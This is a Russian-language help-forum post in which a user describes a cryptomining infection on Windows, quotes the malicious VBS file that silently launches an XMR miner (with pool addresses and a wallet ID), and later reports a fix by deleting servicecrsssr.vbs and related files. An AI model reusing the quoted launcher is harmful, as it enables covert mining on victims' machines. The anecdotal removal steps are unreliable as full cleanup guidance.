Первой ошибкой, которую я получил, была ошибка Windows Script Host, описанная как C:\Windows\xdgaudio.vbs
Когда я нашел файл, содержимое было
Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -p x -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x", 0
Set WShell = Nothing
Увидев это и обнаружив майнинг-сервер в строке 3, я узнал, что я стал жертвой какого-то вируса, а это какой-то вирус майнинга.
Шаги, которые я предпринял, чтобы решить эту проблему.
- Сделал глубокое сканирование Windows защитника (ничего не получил)
- Сделал сканирование с использованием Anti-Rootkit (ничего не получил)
- Прокомментировал все сценарии VBS xdgaudio.vbs, чтобы он не выполнялся.
- Перейдя к файлу wmipvrse.exe, расположенному по адресу C:\Windows\System32\wbem, и обнаружил, что это служба Windows. Я не удалил ее, а переименовал в другое, после вступления во владение, чтобы он не запустился снова.
После выполнения вышеуказанных шагов ошибки исчезли
ИДК, что за сколько времени я был заражен этим вирусом и как он попал на мой компьютер.
Мой вопрос к сообществу - сообщить мне, спасен ли я от этого вируса, и какие дальнейшие шаги я должен сделать, чтобы полностью удалить этот и другие вирусы, подобные этому, и как узнать, существуют ли другие вирусы, подобные этому?
Если вам нужны какие-либо другие детали, вы можете спросить в комментариях.
Спасибо.
Ошибка сценария, которая была сначала отображена, была этой.
ОБНОВИТЬ:
Догадаться!! Краткий ответ: удалите файл «servicecrsssr.vbs» из своего каталога Windows, затем перезагрузите компьютер. (Я на самом деле вытащил PLUG, несмотря на опасность потери / повреждения файла, чтобы исключить возможность попытки программы перезаписать какие-либо поврежденные файлы во время завершения работы.)
Вовлечен ряд других файлов, но после удаления (или переименования) указанного выше файла и перезагрузки все прошло хорошо ... никаких признаков запуска процесса добычи. Я подхватил этот вирус на двух моих тестовых компьютерах. Это были единственные компьютеры, к которым я подключил зараженный диск моего клиента через USB. Это все еще загадка, как именно эта вещь распространяется! Другие файлы, которые, казалось, были вовлечены:
\Windows\winprs.bat
\Windows\winvpr.vbs
\Windows\winvprse.bat
\Windows\xdgaudio.vbs
\Windows\Prefetch\WMIPVRSE.exe-xxxxxxxx.pf
Файл * .pf перезаписывается с новыми случайными символами вместо "x", если вы переименовываете или удаляете его и перезагружаетесь - без какого-либо вредного воздействия, которое я могу определить. На моей первой зараженной машине я переименовал ВСЕ файлы выше, перезагружаясь после переименования каждого из них. Последний файл, который я пробовал, был "servicecrsssr.vbs". На втором зараженном тестовом компьютере я только переименовал файл "servicecrsssr.vbs" и перезагрузил компьютер, тогда все было хорошо. Пожалуйста, дайте мне знать, как это работает для вас. Спасибо!
Отдельное спасибо ответу LREmery